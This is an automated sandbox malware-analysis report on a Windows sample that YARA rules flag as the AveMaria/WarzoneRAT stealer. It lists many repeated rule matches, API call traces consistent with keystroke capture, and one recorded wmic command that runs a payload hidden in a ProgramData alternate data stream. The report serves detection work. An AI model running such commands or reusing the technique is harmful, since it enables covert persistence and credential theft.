          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1902E DefWindowProcA,GetRawInputData,GetRawInputData,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrcpyW,CreateFileW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,CloseHandle,PostQuitMessage,RegisterRawInputDevices,0_2_02D1902E

          E-Banking Fraud

          barindex
          Yara detected AveMaria stealer
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Contains functionality to create processes via WMI
          Source: WMIC.exe, 0000000D.00000002.288337503.000001B74FE00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C:\Windows\System32\Wbem\WMIC.exewmic process call create '"C:\ProgramData:ApplicationData"'wmic process call create '"C:\ProgramData:ApplicationData"'Winsta0\Default
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_004158080_2_00415808
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_004129220_2_00412922
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_004124800_2_00412480
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00416D230_2_00416D23
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_004156DB0_2_004156DB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040B7840_2_0040B784
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D21BF80_2_02D21BF8
          Source: C:\ProgramData\images.exeCode function: 4_3_02F542D04_3_02F542D0
          Source: C:\ProgramData\images.exeCode function: 4_3_02F91AA04_3_02F91AA0
          Source: C:\ProgramData\images.exeCode function: 4_3_02F86B504_3_02F86B50
          Source: C:\ProgramData\images.exeCode function: 4_3_02F45AB04_3_02F45AB0
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmi.dllJump to behavior
          Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
          Source: Joe Sandbox ViewDropped File: C:\Program Files\Microsoft DN1\sqlmap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
